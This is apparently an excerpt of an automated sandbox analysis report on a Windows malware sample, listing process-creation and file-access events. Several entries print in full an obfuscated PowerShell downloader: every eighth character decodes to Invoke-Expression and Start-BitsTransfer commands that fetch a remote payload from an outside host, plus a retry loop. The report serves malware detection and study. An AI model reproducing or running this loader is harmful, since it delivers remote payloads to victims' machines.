'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "function opinions ($sold){for($peder=7; $peder -lt $sold.length-1; $peder+=8){ $becifr20+=$sold.substring($peder, 1);}$becifr20;}$becifr2001=opinions 'udkonkuirecomple chilidxclubbin ';$becifr2002=opinions 'metrenetskryderrfokusera nonappn buckarsaldehydfcitatioe stupidrtrykkerrfollicuiforkontn inddelg ghostl ';function folkemund ($kvke){& ($becifr2001) ($kvke);}$eksped=opinions ' splitfhhighbrot querimtmyrsiphpaymissastrilloe:hjemmeh/ artens/crescogwbevogtew unpanewtristra. vokslya godkensbedeviltergograefiligranplanlgntemhtteoedennisgrhuldsagpniveauorinsectoivalentisinspmiserrigeresfudderl.infantec skabekoheliconmskillev.raderinp maaneskupaavir/starkesm kolonisalungar/ babkasnbastideofoedselnindtgtsn atombo2svogers1 duelbe5aabenhe.metrummppapirperdesignlmworsset ';$becifr2000=opinions 'buldogg$psychoagsaxofonl throbloafhuggcbtrichopa roduddl bighte:unthroat embrasalissomnckeglestktombololsolutioe overrostjenestskvllereeerklaer2 pastic2tilsprg1ohmensd8afsvkke hmskoen=diacety privatesbeneceptpentaplahvedomrrmerotomtreserve-reductibreautheimegaloctaffixiasfinlndetushabtirintrabrakompagnnmaimoniskavalerfsekundoeocotillrpatrulj daadyre-outdegrsmindediosteropeuennoblerproportcfornrmee gaases inhomog$tripennegelatinkparoxysslommenspgropedoepilenhjdmonopol mellemm-pastoradbrndboreforfrersunderfothurtigri geissonflabbieapeculiatunfelinimusicalofeminolnvuggevi engarba$tekstretbolsjevafilmfrocflinchekwindsurlgumpekaecustomissvirrefsoprikkee datako2svingni2 system1gracise2 memora ';folkemund (opinions 'oliearb$thermotgsvindlelaffatteoblgenexbparadigamrkbareldelouse: kvindetbivognra pectinc nonbudkbiindtglplanishecryptocsovervinsbootstretelangi2svejser2notewis1omstnin2fugleko=mandler$murkronevenskabnstandarvdemenss:kladdebaspiritup hdersppbandernd cybelea frisketoscularaelkhorn ') ;folkemund (opinions 'vesperticanamoam podophp raketvoporionsrforstant dimnaf- sprayembevrtnioprogramdtrepaneubesiegelbygninge fodred hematocb coupeeistambortdameskrscartogrthawsepirtyvekroa skrivenflaadeos metrecf serrate sluknirhypochn ') ;$tacklesse2212=$tacklesse2212+'\inte.reg' ;folkemund (opinions ' swazil$livligegcyclohel dartleo paternb thengeasorehealpolrtch:boligmitdecolouarevanchcnonconfkformatklivorineecoactivs nailapshereditemoorman2sagvold2hertugd1langtur7otectom=eventua(heterogtpikakefenydannesudmajnitundlade-ultramapwarlockanymphomtverdenehcricket concept$fagbevgt acetaraamminoscheniquekregnefuluninvadekonfliksenchases bestaneinflowe2potrero2 satsbi1rillsto2grafolo)beholde ') ;while (-not $tacklesse2217) {folkemund (opinions 'haandboi kehoeifontocyc parachu( fortst$guisardtprimtalasammenscgrittedkakademilwitnessesynanthspantheisbegramsedagtyve2ludebro2mostere1vejledn8henlgge.hestehajbarselsodscommub trgrnosomsadlitfishetkalevittet interseridicul impossi- decubieargumenqforeskr kontrol$brasenebmaglemoehyppigecteodiczi kuskecfallehelrleguage2 tak
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function opinions ($sold){for($peder=7; $peder -lt $sold.length-1; $peder+=8){ $becifr20+=$sold.substring($peder, 1);}$becifr20;}$becifr2001=opinions 'udkonkuirecomple chilidxclubbin ';$becifr2002=opinions 'metrenetskryderrfokusera nonappn buckarsaldehydfcitatioe stupidrtrykkerrfollicuiforkontn inddelg ghostl ';function folkemund ($kvke){& ($becifr2001) ($kvke);}$eksped=opinions ' splitfhhighbrot querimtmyrsiphpaymissastrilloe:hjemmeh/ artens/crescogwbevogtew unpanewtristra. vokslya godkensbedeviltergograefiligranplanlgntemhtteoedennisgrhuldsagpniveauorinsectoivalentisinspmiserrigeresfudderl.infantec skabekoheliconmskillev.raderinp maaneskupaavir/starkesm kolonisalungar/ babkasnbastideofoedselnindtgtsn atombo2svogers1 duelbe5aabenhe.metrummppapirperdesignlmworsset ';$becifr2000=opinions 'buldogg$psychoagsaxofonl throbloafhuggcbtrichopa roduddl bighte:unthroat embrasalissomnckeglestktombololsolutioe overrostjenestskvllereeerklaer2 pastic2tilsprg1ohmensd8afsvkke hmskoen=diacety privatesbeneceptpentaplahvedomrrmerotomtreserve-reductibreautheimegaloctaffixiasfinlndetushabtirintrabrakompagnnmaimoniskavalerfsekundoeocotillrpatrulj daadyre-outdegrsmindediosteropeuennoblerproportcfornrmee gaases inhomog$tripennegelatinkparoxysslommenspgropedoepilenhjdmonopol mellemm-pastoradbrndboreforfrersunderfothurtigri geissonflabbieapeculiatunfelinimusicalofeminolnvuggevi engarba$tekstretbolsjevafilmfrocflinchekwindsurlgumpekaecustomissvirrefsoprikkee datako2svingni2 system1gracise2 memora ';folkemund (opinions 'oliearb$thermotgsvindlelaffatteoblgenexbparadigamrkbareldelouse: kvindetbivognra pectinc nonbudkbiindtglplanishecryptocsovervinsbootstretelangi2svejser2notewis1omstnin2fugleko=mandler$murkronevenskabnstandarvdemenss:kladdebaspiritup hdersppbandernd cybelea frisketoscularaelkhorn ') ;folkemund (opinions 'vesperticanamoam podophp raketvoporionsrforstant dimnaf- sprayembevrtnioprogramdtrepaneubesiegelbygninge fodred hematocb coupeeistambortdameskrscartogrthawsepirtyvekroa skrivenflaadeos metrecf serrate sluknirhypochn ') ;$tacklesse2212=$tacklesse2212+'\inte.reg' ;folkemund (opinions ' swazil$livligegcyclohel dartleo paternb thengeasorehealpolrtch:boligmitdecolouarevanchcnonconfkformatklivorineecoactivs nailapshereditemoorman2sagvold2hertugd1langtur7otectom=eventua(heterogtpikakefenydannesudmajnitundlade-ultramapwarlockanymphomtverdenehcricket concept$fagbevgt acetaraamminoscheniquekregnefuluninvadekonfliksenchases bestaneinflowe2potrero2 satsbi1rillsto2grafolo)beholde ') ;while (-not $tacklesse2217) {folkemund (opinions 'haandboi kehoeifontocyc parachu( fortst$guisardtprimtalasammenscgrittedkakademilwitnessesynanthspantheisbegramsedagtyve2ludebro2mostere1vejledn8henlgge.hestehajbarselsodscommub trgrnosomsadlitfishetkalevittet interseridicul impossi- decubieargumenqforeskr kontrol$brasenebmaglemoehyppigecteodiczi kuskecfallehelrleguage2 tak
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "function opinions ($sold){for($peder=7; $peder -lt $sold.length-1; $peder+=8){ $becifr20+=$sold.substring($peder, 1);}$becifr20;}$becifr2001=opinions 'udkonkuirecomple chilidxclubbin ';$becifr2002=opinions 'metrenetskryderrfokusera nonappn buckarsaldehydfcitatioe stupidrtrykkerrfollicuiforkontn inddelg ghostl ';function folkemund ($kvke){& ($becifr2001) ($kvke);}$eksped=opinions ' splitfhhighbrot querimtmyrsiphpaymissastrilloe:hjemmeh/ artens/crescogwbevogtew unpanewtristra. vokslya godkensbedeviltergograefiligranplanlgntemhtteoedennisgrhuldsagpniveauorinsectoivalentisinspmiserrigeresfudderl.infantec skabekoheliconmskillev.raderinp maaneskupaavir/starkesm kolonisalungar/ babkasnbastideofoedselnindtgtsn atombo2svogers1 duelbe5aabenhe.metrummppapirperdesignlmworsset ';$becifr2000=opinions 'buldogg$psychoagsaxofonl throbloafhuggcbtrichopa roduddl bighte:unthroat embrasalissomnckeglestktombololsolutioe overrostjenestskvllereeerklaer2 pastic2tilsprg1ohmensd8afsvkke hmskoen=diacety privatesbeneceptpentaplahvedomrrmerotomtreserve-reductibreautheimegaloctaffixiasfinlndetushabtirintrabrakompagnnmaimoniskavalerfsekundoeocotillrpatrulj daadyre-outdegrsmindediosteropeuennoblerproportcfornrmee gaases inhomog$tripennegelatinkparoxysslommenspgropedoepilenhjdmonopol mellemm-pastoradbrndboreforfrersunderfothurtigri geissonflabbieapeculiatunfelinimusicalofeminolnvuggevi engarba$tekstretbolsjevafilmfrocflinchekwindsurlgumpekaecustomissvirrefsoprikkee datako2svingni2 system1gracise2 memora ';folkemund (opinions 'oliearb$thermotgsvindlelaffatteoblgenexbparadigamrkbareldelouse: kvindetbivognra pectinc nonbudkbiindtglplanishecryptocsovervinsbootstretelangi2svejser2notewis1omstnin2fugleko=mandler$murkronevenskabnstandarvdemenss:kladdebaspiritup hdersppbandernd cybelea frisketoscularaelkhorn ') ;folkemund (opinions 'vesperticanamoam podophp raketvoporionsrforstant dimnaf- sprayembevrtnioprogramdtrepaneubesiegelbygninge fodred hematocb coupeeistambortdameskrscartogrthawsepirtyvekroa skrivenflaadeos metrecf serrate sluknirhypochn ') ;$tacklesse2212=$tacklesse2212+'\inte.reg' ;folkemund (opinions ' swazil$livligegcyclohel dartleo paternb thengeasorehealpolrtch:boligmitdecolouarevanchcnonconfkformatklivorineecoactivs nailapshereditemoorman2sagvold2hertugd1langtur7otectom=eventua(heterogtpikakefenydannesudmajnitundlade-ultramapwarlockanymphomtverdenehcricket concept$fagbevgt acetaraamminoscheniquekregnefuluninvadekonfliksenchases bestaneinflowe2potrero2 satsbi1rillsto2grafolo)beholde ') ;while (-not $tacklesse2217) {folkemund (opinions 'haandboi kehoeifontocyc parachu( fortst$guisardtprimtalasammenscgrittedkakademilwitnessesynanthspantheisbegramsedagtyve2ludebro2mostere1vejledn8henlgge.hestehajbarselsodscommub trgrnosomsadlitfishetkalevittet interseridicul impossi- decubieargumenqforeskr kontrol$brasenebmaglemoehyppigecteodiczi kuskecfallehelrleguage2 takJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function opinions ($sold){for($peder=7; $peder -lt $sold.length-1; $peder+=8){ $becifr20+=$sold.substring($peder, 1);}$becifr20;}$becifr2001=opinions 'udkonkuirecomple chilidxclubbin ';$becifr2002=opinions 'metrenetskryderrfokusera nonappn buckarsaldehydfcitatioe stupidrtrykkerrfollicuiforkontn inddelg ghostl ';function folkemund ($kvke){& ($becifr2001) ($kvke);}$eksped=opinions ' splitfhhighbrot querimtmyrsiphpaymissastrilloe:hjemmeh/ artens/crescogwbevogtew unpanewtristra. vokslya godkensbedeviltergograefiligranplanlgntemhtteoedennisgrhuldsagpniveauorinsectoivalentisinspmiserrigeresfudderl.infantec skabekoheliconmskillev.raderinp maaneskupaavir/starkesm kolonisalungar/ babkasnbastideofoedselnindtgtsn atombo2svogers1 duelbe5aabenhe.metrummppapirperdesignlmworsset ';$becifr2000=opinions 'buldogg$psychoagsaxofonl throbloafhuggcbtrichopa roduddl bighte:unthroat embrasalissomnckeglestktombololsolutioe overrostjenestskvllereeerklaer2 pastic2tilsprg1ohmensd8afsvkke hmskoen=diacety privatesbeneceptpentaplahvedomrrmerotomtreserve-reductibreautheimegaloctaffixiasfinlndetushabtirintrabrakompagnnmaimoniskavalerfsekundoeocotillrpatrulj daadyre-outdegrsmindediosteropeuennoblerproportcfornrmee gaases inhomog$tripennegelatinkparoxysslommenspgropedoepilenhjdmonopol mellemm-pastoradbrndboreforfrersunderfothurtigri geissonflabbieapeculiatunfelinimusicalofeminolnvuggevi engarba$tekstretbolsjevafilmfrocflinchekwindsurlgumpekaecustomissvirrefsoprikkee datako2svingni2 system1gracise2 memora ';folkemund (opinions 'oliearb$thermotgsvindlelaffatteoblgenexbparadigamrkbareldelouse: kvindetbivognra pectinc nonbudkbiindtglplanishecryptocsovervinsbootstretelangi2svejser2notewis1omstnin2fugleko=mandler$murkronevenskabnstandarvdemenss:kladdebaspiritup hdersppbandernd cybelea frisketoscularaelkhorn ') ;folkemund (opinions 'vesperticanamoam podophp raketvoporionsrforstant dimnaf- sprayembevrtnioprogramdtrepaneubesiegelbygninge fodred hematocb coupeeistambortdameskrscartogrthawsepirtyvekroa skrivenflaadeos metrecf serrate sluknirhypochn ') ;$tacklesse2212=$tacklesse2212+'\inte.reg' ;folkemund (opinions ' swazil$livligegcyclohel dartleo paternb thengeasorehealpolrtch:boligmitdecolouarevanchcnonconfkformatklivorineecoactivs nailapshereditemoorman2sagvold2hertugd1langtur7otectom=eventua(heterogtpikakefenydannesudmajnitundlade-ultramapwarlockanymphomtverdenehcricket concept$fagbevgt acetaraamminoscheniquekregnefuluninvadekonfliksenchases bestaneinflowe2potrero2 satsbi1rillsto2grafolo)beholde ') ;while (-not $tacklesse2217) {folkemund (opinions 'haandboi kehoeifontocyc parachu( fortst$guisardtprimtalasammenscgrittedkakademilwitnessesynanthspantheisbegramsedagtyve2ludebro2mostere1vejledn8henlgge.hestehajbarselsodscommub trgrnosomsadlitfishetkalevittet interseridicul impossi- decubieargumenqforeskr kontrol$brasenebmaglemoehyppigecteodiczi kuskecfallehelrleguage2 takJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
